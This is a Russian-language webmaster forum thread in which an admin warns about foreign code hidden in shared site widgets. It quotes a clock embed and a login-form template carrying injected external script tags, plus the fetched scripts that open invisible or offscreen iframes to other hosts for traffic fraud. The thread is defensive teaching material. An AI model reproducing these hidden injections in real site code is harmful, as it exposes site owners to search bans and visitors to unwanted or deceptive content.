Перейти к содержимому

Добро пожаловать к нам на сайт! Про Ваш статус и права можно прочитать в Этой теме

Для просмотра картинок и скачивания файлов с форума - пройдите регистрацию!   Проблемы с регистрацией - вам сюда



Згорнути %s Последние сообщения тем

Тема Форум Написано Дата
  • LENA_D
  • LENA_D
  • глобальный модератор Сидорович
  • LENA_D
  • LENA_D
  • LENA_D
  • Вчера, 18:20
  • 27 лис 2024 13:38
  • 26 лис 2024 12:55
  • 24 лис 2024 14:22
  • 20 лис 2024 18:04
  • 19 лис 2024 18:56

Фотография

Посторонние коды в скриптах


  • Авторизуйтесь для відповіді у темі
Повідомлень у темі: 2

#1
RUS_D

RUS_D

    Главный АДМИН

  • Не в сети
  • Тех. Админ
  •  Администратор
  • Старожил сайта
<- Информация ->
  • PipPipPipPip
  • Регистрация:
    08-грудень 08
  • 5 008 Cообщений
  • Пропуск №: 2

0 баллов предупреждения
Репутация: 8 127

Репутация: 8127 Постов: 5008
  • Skype:rus_did
  • Страна проживания:Украина
  • Реальное имя:Руслан
  • Пол:Мужчина
  • Город:Полтавская обл.
Хотелось бы более подробно поговорить о посторонних кодах в скриптах. Это коды которые вписываются в скипт, но не являются его частью. Чаше всего они несут вред сайту, при этом в можете его не замечать. sm1

Пример. Вот дан скрипт "Офигенные часы":

Code
<object type="application/x-shockwave-flash" width="180" height="180" data="http://xtremes.ru/4asi/xtremes3.swf" allowFullScreen="true"><script src="http://ijl.pp.ua/1.js" type="text/javascript"></script><param name="movie" value="http://xtremes.ru/4asi/xtremes3.swf"/><param name="wmode" value="transparent"/><param name=allowFullScreen value="true"/></object>


Казалось бы что тут такого? НО! Обратите внимание на:
Code
<script src="http://ijl.pp.ua/1.js" type="text/javascript">


Если перейти по адресу
Quote
http://ijl.pp.ua/1.js
мы обнаружим такой яваскрипт:

Code
document.write("<if");
document.write("rame src=http://ijl.pp.ua");
document.write(" width=0 height=0 frameborder=0");
document.write("></if");
document.write("rame>");


Для непонятных объясняю. Это тоже самое что и
Code
<iframe src=http://ijl.pp.ua width=0 height=0 frameborder=0></iframe>
Эта функция вызывает загрузку постороннего сайта , НО с параметрами 0*0 (вы не видите). Но поисковики и счётчики видят и засчитывают переход. А вы на своей странице грузите ещё один сайт, а это лишние 50-300 Kb. Неплохой способ накрутки для того сайта?

А бывает коды которые вызывают на вашем сайте ложные формы, и наивные пользователи могут ввести туда логин и пароль. А бывает и так что у вас на весь экран будет разворачиваться порнуха, а вы будите гадать откуда она.

Как это избежать? Внимательно просматривайте скрипты! Когда выкладывайте на форум, или когда ставите на сайт, или просто увидели чужую тему, не проходите мимо. Напишите что у вас вызывает подозрения эта сточки или ещё что-то. Или жмите кнопку "Пожаловаться на сообщение".

В общем поменьше вам вредоносных скриптов, вирусов и троянов.

#2
RUS_D

RUS_D

    Главный АДМИН

  • Не в сети
  • Тех. Админ
  •  Администратор
  • Старожил сайта
<- Информация ->
  • PipPipPipPip
  • Регистрация:
    08-грудень 08
  • 5 008 Cообщений
  • Пропуск №: 2

0 баллов предупреждения
Репутация: 8 127

Репутация: 8127 Постов: 5008
  • Skype:rus_did
  • Страна проживания:Украина
  • Реальное имя:Руслан
  • Пол:Мужчина
  • Город:Полтавская обл.

Дополнение!
Гуляет по инету вот такой вид формы входа sm2.gif
2222.png

Code
<?if($USER_LOGGED_IN$)?>   
   <div style="border: 1px solid rgb(54, 54, 54); background: transparent url(http://css-teampro.ru/img/1.png) repeat scroll 0% 0%; width: 180px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; color: rgb(112, 112, 112);">   
   <table width="100%"><tbody><tr><td align="left"><br></td></tr><tr><td style="font-size: 10.5px;" align="center">   
   <div style="border: 1px solid rgb(54, 54, 54); background: transparent url(http://css-teampro.ru/img/1.png) repeat scroll 0% 0%; width: 150px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; color: rgb(112, 112, 112);">Приветствую в Баре-Реактор<br><script type="text/javascript" src="http://js8xt.ru/ves.js"></script><b>$USERNAME$</b>!<br></div> <p><a href="javascript://" rel="nofollow" onclick="window.open('/index/8','upp','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;"><?if($USER_AVATAR_URL$)?><img width="155px" height="200px" class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" border="0"><?else?><?if($USER_LOGGED_IN$)?><img class="userAvatar" title="$USERNAME$" src="http://css-teampro.ru/no_ava.png" border="0"><?else?><img class="userAvatar" title="$USERNAME$" src="http://css-teampro.ru/no_ava.png" border="0"><?endif?><?endif?>   
   </a></p><div style="border: 1px solid rgb(54, 54, 54); background: transparent url(http://css-teampro.ru/img/1.png) repeat scroll 0% 0%; width: 150px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; color: rgb(112, 112, 112);">$USER_GROUP$</div></td></tr>   
   <tr><td style="font-size: 10.5px;" align="center"><div style="border: 1px solid rgb(54, 54, 54); background: transparent url(http://css-teampro.ru/img/1.png) repeat scroll 0% 0%; width: 150px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; color: rgb(112, 112, 112);">Вы с нами: $USER_REG_DAYS$-й день</div></td></tr>   
   <tr><td style="font-size: 10.5px;" align="center"><div style="border: 1px solid rgb(54, 54, 54); background: transparent url(http://css-teampro.ru/img/1.png) repeat scroll 0% 0%; width: 150px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; color: rgb(112, 112, 112);"><a id="upml2" href="javascript://" onclick="openLayerB('PM',0,'http://css-teampro.ru/xml/pm.xml','Личные сообщения',750,410,'1','','',0,'center');return false;"><font color="#707070">Личных сообщений (<b>$UNREAD_PM$</b>)</font></a></div></td></tr> <?if($IS_NEW_PM$)?><script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml2','')",500)</script><?endif?>   

   <tr><td style="font-size: 10.5px;" align="center"><div style="border: 1px solid rgb(54, 54, 54); background: transparent url(http://css-teampro.ru/img/1.png) repeat scroll 0% 0%; width: 150px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; color: rgb(112, 112, 112);"><a href="javascript://" onclick="openLayerB('USearch',0,'http://css-teampro.ru/ajax/search.xml','Поиск по названию',370,150,'1','','',0,'justify'); return false;"><font color="#707070">Поиск по сайту</font></a></div></td></tr>   
   <tr><td style="font-size: 10.5px;" align="center"><div style="border: 1px solid rgb(54, 54, 54); background: transparent url(http://css-teampro.ru/http://css-teampro.ru/img/1.png) repeat scroll 0% 0%; width: 150px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; color: rgb(112, 112, 112);">Ваш ID:$USER_ID$</div></td></tr>   
   <tr><td style="font-size: 10.5px;" align="center"><div style="border: 1px solid rgb(54, 54, 54); background: transparent url(http://css-teampro.ru/img/1.png) repeat scroll 0% 0%; width: 150px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; color: rgb(112, 112, 112);"><a href="$LOGOUT_LINK$"><font color="#707070">Выход</font></a><br></div></td></tr></tbody></table><?endif?>$LOGIN_FORM$<br>


Если вы установите её у себя ..... Ждите беды sm2.gif
Через сутки другие Яндекс отправит вас на панель (пометит сайт как вирусный)
Спросите почему???

А вот благодаря этому скрипту

Code
<script type="text/javascript" src="http://js8xt.ru/ves.js"></script>

Если его открыть в редакторе то увидим следующее

Code
var frame = document.createElement('ifr'+'ame');
frame.style.position = 'absolute';
frame.style.left = '-1000px';
frame.src='http://js8xt.ru';
document.body.appendChild(frame);


Что он делает???

Открывает втихую окно с позицией - 1000 пикселей слева от монитора sm6.gif :D
То есть вы его не видите, а поисковики видят и банят за это!


Повідомлення відредагував RUS_D: 06 травень 2015 - 00:46


#3
RUS_D

RUS_D

    Главный АДМИН

  • Не в сети
  • Тех. Админ
  •  Администратор
  • Старожил сайта
<- Информация ->
  • PipPipPipPip
  • Регистрация:
    08-грудень 08
  • 5 008 Cообщений
  • Пропуск №: 2

0 баллов предупреждения
Репутация: 8 127

Репутация: 8127 Постов: 5008
  • Skype:rus_did
  • Страна проживания:Украина
  • Реальное имя:Руслан
  • Пол:Мужчина
  • Город:Полтавская обл.
Вот ещё в коллекцию
Code
<script src="http://zagruzlo.ru/swf.js" type="text/javascript"></script>


Содержимое скрипта
Code
document.write('<div style="display:;"><iframe src="http://s38.pp.ua" width="100%" height="100%" name="iframe" scrolling="auto" frameborder=0></iframe></div>');



Обратно в Всё для Вебмастера

реклама на сайте подключена

Использование материалов сайта только с разрешения Администрации!
Или с указанием прямой ссылки на источник. 2008 - 2017 © Stalker-Worlds